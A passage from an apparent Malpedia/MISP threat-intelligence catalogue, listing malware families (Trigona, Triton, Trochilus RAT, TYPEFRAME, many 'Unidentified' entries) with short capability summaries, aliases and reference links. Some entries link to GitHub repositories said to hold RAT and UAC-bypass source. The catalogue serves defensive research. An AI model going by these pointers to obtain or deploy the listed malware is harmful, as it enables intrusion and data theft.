https://www.berlin.de/sen/justva/presse/pressemitteilungen/2020/pm-11-2020-t-systems-forensik_bericht_public_v1.pdf

https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/

https://www.bleepingcomputer.com/news/security/trickbot-now-uses-a-windows-10-uac-bypass-to-evade-detection/

https://www.domaintools.com/resources/blog/tracking-a-trickbot-related-ransomware-incident

https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure

https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth

https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a

https://www.hornetsecurity.com/en/security-information/trickbot-malspam-leveraging-black-lives-matter-as-lure/

https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf

https://blog.fraudwatchinternational.com/malware/trickbot-malware-works

https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html

https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/

https://elis531989.medium.com/the-chronicles-of-bumblebee-the-hook-the-bee-and-the-trickbot-connection-686379311056

https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-trickbot-infections/

https://www.justice.gov/opa/pr/latvian-national-charged-alleged-role-transnational-cybercrime-organization

https://www.advintel.io/post/the-trickbot-saga-s-finale-has-aired-but-a-spinoff-is-already-in-the-works

https://www.kryptoslogic.com/blog/2021/07/trickbot-and-zeus/

https://www.zscaler.com/blogs/research/trickbot-emerges-few-new-tricks

http://www.vkremez.com/2018/04/lets-learn-trickbot-implements-network.html

https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko

https://www.cert.pl/en/news/single/detricking-trickbot-loader/

https://labs.sentinelone.com/building-a-custom-malware-analysis-lab-environment/

https://blog.malwarebytes.com/threat-analysis/malware-threat-analysis/2018/11/whats-new-trickbot-deobfuscating-elements/

https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware

https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?blob=publicationFile&v=2

https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/

https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-2-loader

https://securelist.com/trickbot-module-descriptions/104603/

https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

https://www.welivesecurity.com/2020/10/12/eset-takes-part-global-operation-disrupt-trickbot/

https://thehackernews.com/2022/05/malware-analysis-trickbot.html

https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/

https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf

https://www.cisa.gov/uscert/ncas/alerts/aa22-110a

https://www.govcert.ch/blog/37/trickbot-an-analysis-of-data-collected-from-the-botnet

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://intel471.com/blog/privateloader-malware

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://escinsecurity.blogspot.de/2018/01/weekly-trickbot-analysis-end-of-wc-22.html

https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf

Trigona

According to PCrisk, Trigona is ransomware that encrypts files and appends the "._locked" extension to filenames. Also, it drops the "how_to_decrypt.hta" file that opens a ransom note. An example of how Trigona renames files: it renames "1.jpg" to "1.jpg._locked", "2.png" to "2.png._locked", and so forth.

It embeds the encrypted decryption key, the campaign ID, and the victim ID in the encrypted files.

The tag is: misp-galaxy:malpedia="Trigona"

Trigona is also known as:

Table 4798. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.trigona

https://resources.prodaft.com/wazawaka-report

https://www.trendmicro.com/en_us/research/23/f/an-overview-of-the-trigona-ransomware.html

https://asec.ahnlab.com/en/51343/

https://www.fortinet.com/blog/threat-research/ransomware-roundup-trigona-ransomware

https://unit42.paloaltonetworks.com/trigona-ransomware-update/

Triton

Malware attacking commonly used in Industrial Control Systems (ICS) Triconex Safety Instrumented System (SIS) controllers.

The tag is: misp-galaxy:malpedia="Triton"

Triton is also known as:

  • HatMan

  • Trisis

Table 4799. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.triton

https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors

https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf

https://www.nozominetworks.com//downloads/US/Nozomi-Networks-TRITON-The-First-SIS-Cyberattack.pdf

https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security

https://www.mandiant.com/resources/mandiant-red-team-emulates-fin11-tactics

https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware

https://github.com/ICSrepo/TRISIS-TRITON-HATMAN

https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf

https://dragos.com/blog/trisis/TRISIS-01.pdf

https://us-cert.cisa.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20A%29_S508C.PDF

https://home.treasury.gov/news/press-releases/sm1162

https://www.cisa.gov/uscert/ncas/alerts/aa22-083a

https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1538425180.pdf

https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html

https://www.cisa.gov/uscert/ncas/alerts/aa22-110a

https://securelist.com/apt-trends-report-q2-2019/91897/

https://www.eenews.net/stories/1060123327/

https://www.ic3.gov/Media/News/2022/220325.pdf

Trochilus RAT

Trochilus is a C++ written RAT, which is available on GitHub. GitHub Repo: - https://github.com/m0n0ph1/malware-1/tree/master/Trochilus - https://github.com/5loyd/trochilus

The tag is: misp-galaxy:malpedia="Trochilus RAT"

Trochilus RAT is also known as:

Table 4800. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.trochilus_rat

https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html

https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn

https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf

https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf

https://www.secureworks.com/research/bronze-vinewood-targets-supply-chains

https://www.secureworks.com/research/threat-profiles/bronze-vinewood

https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia

https://github.com/m0n0ph1/malware-1/tree/master/Trochilus

https://github.com/5loyd/trochilus/

https://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf

https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf

https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats

TroubleGrabber

The tag is: misp-galaxy:malpedia="TroubleGrabber"

TroubleGrabber is also known as:

Table 4802. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.troublegrabber

https://www.netskope.com/blog/here-comes-troublegrabber-stealing-credentials-through-discord

troystealer

The tag is: misp-galaxy:malpedia="troystealer"

troystealer is also known as:

Table 4803. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.troystealer

https://seguranca-informatica.pt/troystealer-a-new-info-stealer-targeting-portuguese-internet-users

Trump Ransom

The tag is: misp-galaxy:malpedia="Trump Ransom"

Trump Ransom is also known as:

Table 4804. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.trump_ransom

Tsifiri

The tag is: misp-galaxy:malpedia="Tsifiri"

Tsifiri is also known as:

Table 4805. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tsifiri

TUNNELFISH

The tag is: misp-galaxy:malpedia="TUNNELFISH"

TUNNELFISH is also known as:

Table 4806. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tunnelfish

https://www.secureworks.com/blog/opsec-mistakes-reveal-cobalt-mirage-threat-actors

turian

According to Mitre, Turian is a backdoor that has been used by BackdoorDiplomacy to target Ministries of Foreign Affairs, telecommunication companies, and charities in Africa, Europe, the Middle East, and Asia. First reported in 2021, Turian is likely related to Quarian, an older backdoor that was last observed being used in 2013 against diplomatic targets in Syria and the United States.

The tag is: misp-galaxy:malpedia="turian"

turian is also known as:

Table 4807. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.turian

https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/

https://unit42.paloaltonetworks.com/playful-taurus/

https://www.fortinet.com/blog/threat-research/analysis-of-follina-zero-day

TYPEFRAME

TYPEFRAME is a RAT.

It supports ~25 commands that include operations on the victim’s filesystem, manipulation with its configuration, modification of the system’s firewall, the download and execution of additional tools from the attacker’s C&C and the uninstall via a self-delete batch. The commands are indexed by 16-bit integers, starting with the value 0x8000.

The RAT uses RC4 for decryption of its binary configuration. It has a statically linked OpenSSL 0.9.8k library used for SSL communication.

The tag is: misp-galaxy:malpedia="TYPEFRAME"

TYPEFRAME is also known as:

Table 4812. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.typeframe

https://www.cisa.gov/news-events/analysis-reports/ar18-165a

Typhon Stealer

According to PCrisk, Typhon is a stealer-type malware written in the C# programming language. Newer versions of this program are called Typhon Reborn (TyphonReborn). Malware within this classification is designed to extract data from infected systems. The older variants of Typhon have a broader range of functionalities, while Typhon Reborn versions are streamlined stealers.

The tag is: misp-galaxy:malpedia="Typhon Stealer"

Typhon Stealer is also known as:

  • Typhon Reborn V2

Table 4814. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.typhon_stealer

https://blog.talosintelligence.com/typhon-reborn-v2-features-enhanced-anti-analysis/

T-Cmd

The tag is: misp-galaxy:malpedia="T-Cmd"

T-Cmd is also known as:

  • t_cmd

Table 4816. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.t_cmd

https://github.com/crackeeer/2006-defconbot/blob/master/T-cmd.cpp

T-RAT 2.0

The tag is: misp-galaxy:malpedia="T-RAT 2.0"

T-RAT 2.0 is also known as:

Table 4817. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.t_rat

https://www.gdatasoftware.com/blog/trat-control-via-smartphone

UACMe

A toolkit maintained by hfiref0x which incorporates numerous UAC bypass techniques for Windows 7 - Windows 10. Typically, components of this tool are stripped out and reused by malicious actors.

The tag is: misp-galaxy:malpedia="UACMe"

UACMe is also known as:

  • Akagi

Table 4818. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.uacme

https://github.com/hfiref0x/UACME

https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/

Uiwix

The tag is: misp-galaxy:malpedia="Uiwix"

Uiwix is also known as:

Table 4821. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.uiwix

https://www.minerva-labs.com/post/uiwix-evasive-ransomware-exploiting-eternalblue

Umbral

Umbral is a data-stealing Trojan that targets Windows systems. It spreads through phishing emails and malicious attachments. Once installed, Umbral can steal a variety of data, including usernames, passwords, online banking credentials, and confidential files. It can also change computer settings and execute harmful commands. Umbral is a serious security threat and should be removed immediately if found.

The tag is: misp-galaxy:malpedia="Umbral"

Umbral is also known as:

Table 4822. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.umbral

https://blog.cyble.com/2023/06/23/trojanized-super-mario-game-installer-spreads-supremebot-malware/

Unidentified 001

The tag is: misp-galaxy:malpedia="Unidentified 001"

Unidentified 001 is also known as:

Table 4824. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_001

Unidentified 003

The tag is: misp-galaxy:malpedia="Unidentified 003"

Unidentified 003 is also known as:

Table 4825. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_003

Unidentified 006

The tag is: misp-galaxy:malpedia="Unidentified 006"

Unidentified 006 is also known as:

Table 4826. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_006

Unidentified 013 (Korean)

The tag is: misp-galaxy:malpedia="Unidentified 013 (Korean)"

Unidentified 013 (Korean) is also known as:

Table 4827. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_013_korean_malware

http://blog.talosintelligence.com/2017/02/korean-maldoc.html

Unidentified 020 (Vault7)

The tag is: misp-galaxy:malpedia="Unidentified 020 (Vault7)"

Unidentified 020 (Vault7) is also known as:

Table 4828. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_020_cia_vault7

https://wikileaks.org/ciav7p1/cms/page_34308128.html

Unidentified 022 (Ransom)

The tag is: misp-galaxy:malpedia="Unidentified 022 (Ransom)"

Unidentified 022 (Ransom) is also known as:

Table 4829. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_022_ransom

Unidentified 023

The tag is: misp-galaxy:malpedia="Unidentified 023"

Unidentified 023 is also known as:

Table 4830. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_023

Unidentified 024 (Ransomware)

The tag is: misp-galaxy:malpedia="Unidentified 024 (Ransomware)"

Unidentified 024 (Ransomware) is also known as:

Table 4831. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_024_ransom

https://twitter.com/malwrhunterteam/status/789161704106127360

Unidentified 025 (Clickfraud)

The tag is: misp-galaxy:malpedia="Unidentified 025 (Clickfraud)"

Unidentified 025 (Clickfraud) is also known as:

Table 4832. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_025_clickfraud

http://malware-traffic-analysis.net/2016/05/09/index.html

Unidentified 028

The tag is: misp-galaxy:malpedia="Unidentified 028"

Unidentified 028 is also known as:

Table 4833. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_028

Unidentified 029

The tag is: misp-galaxy:malpedia="Unidentified 029"

Unidentified 029 is also known as:

Table 4834. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_029

Unidentified 030 (Ransomware)

Unnamed ransomware that camouflages as a program performing system cleanup called "System Analyzer Pro".

The tag is: misp-galaxy:malpedia="Unidentified 030 (Ransomware)"

Unidentified 030 (Ransomware) is also known as:

Table 4835. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_030

https://twitter.com/JaromirHorejsi/status/877811773826641920

Unidentified 031

The tag is: misp-galaxy:malpedia="Unidentified 031"

Unidentified 031 is also known as:

Table 4836. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_031

Unidentified 037

The tag is: misp-galaxy:malpedia="Unidentified 037"

Unidentified 037 is also known as:

Table 4837. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_037

Unidentified 038

The tag is: misp-galaxy:malpedia="Unidentified 038"

Unidentified 038 is also known as:

Table 4838. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_038

Unidentified 039

The tag is: misp-galaxy:malpedia="Unidentified 039"

Unidentified 039 is also known as:

Table 4839. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_039

Unidentified 041

The tag is: misp-galaxy:malpedia="Unidentified 041"

Unidentified 041 is also known as:

Table 4840. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_041

Unidentified 042

The tag is: misp-galaxy:malpedia="Unidentified 042"

Unidentified 042 is also known as:

Table 4841. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_042

http://www.intezer.com/lazarus-group-targets-more-cryptocurrency-exchanges-and-fintech-companies/

Unidentified 044

The tag is: misp-galaxy:malpedia="Unidentified 044"

Unidentified 044 is also known as:

Table 4842. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_044

Unidentified 045

The tag is: misp-galaxy:malpedia="Unidentified 045"

Unidentified 045 is also known as:

Table 4843. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_045

Unidentified 047

RAT written in Delphi used by Patchwork APT.

The tag is: misp-galaxy:malpedia="Unidentified 047"

Unidentified 047 is also known as:

Table 4844. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_047

https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/

Unidentified 052

The tag is: misp-galaxy:malpedia="Unidentified 052"

Unidentified 052 is also known as:

Table 4845. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_052

Unidentified 053 (Wonknu?)

The tag is: misp-galaxy:malpedia="Unidentified 053 (Wonknu?)"

Unidentified 053 (Wonknu?) is also known as:

Table 4846. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_053

Unidentified 057

Unnamed portscanner as used in the Australian Parliament Hack (Feb 2019).

The tag is: misp-galaxy:malpedia="Unidentified 057"

Unidentified 057 is also known as:

Table 4847. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_057

https://blog.yoroi.company/research/the-arsenal-behind-the-australian-parliament-hack/

Unidentified 066

This .net executable can receive commands from c2 sever, upload and download files according to the returned content, perform an uninstall, or modify the registry to achieve persistence across reboots. At the end, it downloads a Python-based RAT, called PeppyRAT.

The tag is: misp-galaxy:malpedia="Unidentified 066"

Unidentified 066 is also known as:

Table 4849. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_066

https://s.tencent.com/research/report/669.html

Unidentified 067

The tag is: misp-galaxy:malpedia="Unidentified 067"

Unidentified 067 is also known as:

Table 4850. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_067

https://s.tencent.com/research/report/831.html

Unidentified 068

The tag is: misp-galaxy:malpedia="Unidentified 068"

Unidentified 068 is also known as:

Table 4851. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_068

https://rules.emergingthreatspro.com/changelogs/suricata-5.0-enhanced.etpro.2019-12-05T23:38:02.txt

Unidentified 069 (Zeus Unnamed2)

Zeus derivate, no known public references.

The tag is: misp-galaxy:malpedia="Unidentified 069 (Zeus Unnamed2)"

Unidentified 069 (Zeus Unnamed2) is also known as:

Table 4852. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_069

https://zeusmuseum.com/unnamed%202/

Unidentified 070 (Downloader)

Unidentified downloader, possibly related to KONNI.

The tag is: misp-galaxy:malpedia="Unidentified 070 (Downloader)"

Unidentified 070 (Downloader) is also known as:

Table 4853. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_070

https://twitter.com/M11Sec/status/1217781224204357633

Unidentified 071 (Zeus Unnamed1)

The tag is: misp-galaxy:malpedia="Unidentified 071 (Zeus Unnamed1)"

Unidentified 071 (Zeus Unnamed1) is also known as:

Table 4854. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_071

https://zeusmuseum.com/unnamed%201/

Unidentified 072 (Metamorfo Loader)

MSI-based loader that has been observed as a stager for win.metamorfo.

The tag is: misp-galaxy:malpedia="Unidentified 072 (Metamorfo Loader)"

Unidentified 072 (Metamorfo Loader) is also known as:

Table 4855. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_072

https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/metamorfo.md

Unidentified 074 (Downloader)

The tag is: misp-galaxy:malpedia="Unidentified 074 (Downloader)"

Unidentified 074 (Downloader) is also known as:

Table 4856. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_074

https://blog.vincss.net/2019/12/re009-phan-tich-ma-doc-ke-hoach-nhiem-vu-trong-tam-2020.html

Unidentified 075

Unpacked http_dll.dat from the blog post.

The tag is: misp-galaxy:malpedia="Unidentified 075"

Unidentified 075 is also known as:

Table 4857. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_075

Unidentified 078 (Zebrocy Nim Loader?)

Suspected Zebrocy loader written in Nim.

The tag is: misp-galaxy:malpedia="Unidentified 078 (Zebrocy Nim Loader?)"

Unidentified 078 (Zebrocy Nim Loader?) is also known as:

Table 4860. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_078

https://twitter.com/Vishnyak0v/status/1300704689865060353

Unidentified 080

This Trojan is a full-featured RAT capable of executing common tasks such as command execution and downloading/uploading files. This is implemented through a couple dozen C++ classes such as CMFile, CMFile, CMProcess, TFileDownload, TDrive, TProcessInfo, TSock, etc. The first stage custom installer utilizes the same classes. The Trojan uses HTTP Server API to filter HTTPS packets at port 443 and parse commands. It is also used by attackers to gather a target’s data, make lateral movements and create SOCKS tunnels to their C2 using the Earthworm tunneler.Given that the Trojan is an HTTPS server itself, the SOCKS tunnel is used for targets without an external IP, so the C2 is able to send commands.

The tag is: misp-galaxy:malpedia="Unidentified 080"

Unidentified 080 is also known as:

Table 4861. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_080

https://securelist.com/luckymouse-ndisproxy-driver/87914/

Unidentified 081 (Andariel Ransomware)

Kaspersky Labs observed Andariel to drop this ransomware in one case within a series of attacks carried out against targets in South Korea in April 2021.

The tag is: misp-galaxy:malpedia="Unidentified 081 (Andariel Ransomware)"

Unidentified 081 (Andariel Ransomware) is also known as:

Table 4862. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_081

https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/

Unidentified 083 (AutoIT Stealer)

The tag is: misp-galaxy:malpedia="Unidentified 083 (AutoIT Stealer)"

Unidentified 083 (AutoIT Stealer) is also known as:

Table 4863. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_083

https://www.intezer.com/blog/malware-analysis/targeted-phishing-attack-against-ukrainian-government-expands-to-georgia/

Unidentified 085

A RAT written in .NET, potentially used by Transparent Tribe.

The tag is: misp-galaxy:malpedia="Unidentified 085"

Unidentified 085 is also known as:

Table 4864. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_085

https://blog.cyble.com/2021/09/14/apt-group-targets-indian-defense-officials-through-enhanced-ttps/

Unidentified 087

Symantec describes this family as an unidentified tool set used to target a range of organizations in South East Asia. The campaign was first noticed in September 2020.

The tag is: misp-galaxy:malpedia="Unidentified 087 "

Unidentified 087 is also known as:

Table 4865. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_087

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-campaign-south-east-asia?s=09

Unidentified 088 (Nim Ransomware)

Ransomware written in Nim.

The tag is: misp-galaxy:malpedia="Unidentified 088 (Nim Ransomware)"

Unidentified 088 (Nim Ransomware) is also known as:

Table 4866. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_088

https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-part-2-a28bffffa671

Unidentified 091

Avast found this unidentified RAT, which abuses a code-signing certificate by the Philippine Navy. It is statically linked against OpenSSL 1.1.1g.

The tag is: misp-galaxy:malpedia="Unidentified 091"

Unidentified 091 is also known as:

Table 4867. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_091

https://decoded.avast.io/threatintel/avast-finds-compromised-philippine-navy-certificate-used-in-remote-access-tool/

Unidentified 092 (Confucius Backdoor)

According to Antiy CERT, this is a C++ backdoor that was first discovered in an attack by Confucius in September 2020. Its main functions include creating scheduled tasks, retrieving process information, retrieving network adapter information, retrieving disk drive information, uploading files, downloading files, executing files, and providing shell access.

The tag is: misp-galaxy:malpedia="Unidentified 092 (Confucius Backdoor)"

Unidentified 092 (Confucius Backdoor) is also known as:

Table 4868. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_092

https://mp.weixin.qq.com/s/n6XQAGtNEXfPZXp1mlwDTQ

Unidentified 093 (Sidewinder)

Check Point Research observed this malware being used by Sidewinder.

The tag is: misp-galaxy:malpedia="Unidentified 093 (Sidewinder)"

Unidentified 093 (Sidewinder) is also known as:

Table 4869. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_093

https://blog.checkpoint.com/2022/07/13/a-hit-is-made-suspected-india-based-sidewinder-apt-successfully-cyber-attacks-pakistan-military-focused-targets/

Unidentified 095 (Iranian Wiper)

Wiper, using EldoS RawDisk for low level access to disks.

The tag is: misp-galaxy:malpedia="Unidentified 095 (Iranian Wiper)"

Unidentified 095 (Iranian Wiper) is also known as:

Table 4871. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_095

https://www.cisa.gov/uscert/ncas/alerts/aa22-264a

https://www.cisa.gov/uscert/sites/default/files/publications/aa22-264a-iranian-cyber-actors-conduct-cyber-operations-against-the-government-of-albania.pdf

Unidentified 096 (Keylogger)

Keylogger.

The tag is: misp-galaxy:malpedia="Unidentified 096 (Keylogger)"

Unidentified 096 (Keylogger) is also known as:

Table 4872. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_096

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage

Unidentified 099 (APT29 Dropbox Loader)

This malware uses DropBox for C2 and was spread via spear-phishing attack at government organizations. It is different from win.boombox, which is another APT29 attributed malware using DropBox (written in .NET).

The tag is: misp-galaxy:malpedia="Unidentified 099 (APT29 Dropbox Loader)"

Unidentified 099 (APT29 Dropbox Loader) is also known as:

Table 4875. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_099

https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf

https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/APT29_C2-Client_Dropbox_Loader/APT29-DropboxLoader_analysis.md

Unidentified 103 (FIN8)

A malware that uses .NET to load unmanaged (shell)code which has some resemblance to BADHATCH, the IP found in the sample was referred to in coverage on WHITERABBIT ransomware attacks.

The tag is: misp-galaxy:malpedia="Unidentified 103 (FIN8)"

Unidentified 103 (FIN8) is also known as:

  • Sardonic

Table 4877. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_103

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/syssphinx-fin8-backdoor

https://otx.alienvault.com/pulse/61e7f74a936eea5d44026b8e

Unidentified 104

The tag is: misp-galaxy:malpedia="Unidentified 104"

Unidentified 104 is also known as:

Table 4878. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_104

https://twitter.com/jaydinbas/status/1663916211975987201

Unidentified 105

The tag is: misp-galaxy:malpedia="Unidentified 105"

Unidentified 105 is also known as:

Table 4879. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_105

https://twitter.com/h2jazi/status/1681426768597778440

Unidentified 109 (Lazarus?)

The tag is: misp-galaxy:malpedia="Unidentified 109 (Lazarus?)"

Unidentified 109 (Lazarus?) is also known as:

Table 4883. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_109

https://twitter.com/malwrhunterteam/status/1689533484597952514

Unidentified 110 (RustyFlag)

According to Deep Instinct, this information stealer is written in Rust and was observed in Operation Rusty Flag.

The tag is: misp-galaxy:malpedia="Unidentified 110 (RustyFlag)"

Unidentified 110 (RustyFlag) is also known as:

Table 4884. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_110

https://www.deepinstinct.com/blog/operation-rusty-flag-a-malicious-campaign-against-azerbaijanian-targets

Unidentified 111 (IcedID Loader)

First discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim’s machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.

The tag is: misp-galaxy:malpedia="Unidentified 111 (IcedID Loader)"

Unidentified 111 (IcedID Loader) is also known as:

  • BLACKWIDOW

  • Latrodectus

  • Lotus

Table 4885. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_111

https://twitter.com/Myrtus0x0/status/1732997981866209550

https://www.esentire.com/blog/danabots-latest-move-deploying-icedid

https://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39

Unidentified 112 (Rust-based Stealer)

A Rust-based stealer, observed by Seqrite, along TTPs overlapping with Pakistan-linked APT groups.

The tag is: misp-galaxy:malpedia="Unidentified 112 (Rust-based Stealer)"

Unidentified 112 (Rust-based Stealer) is also known as:

Table 4886. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_112

https://www.seqrite.com/blog/operation-rusticweb-targets-indian-govt-from-rust-based-malware-to-web-service-exfiltration/

Upatre

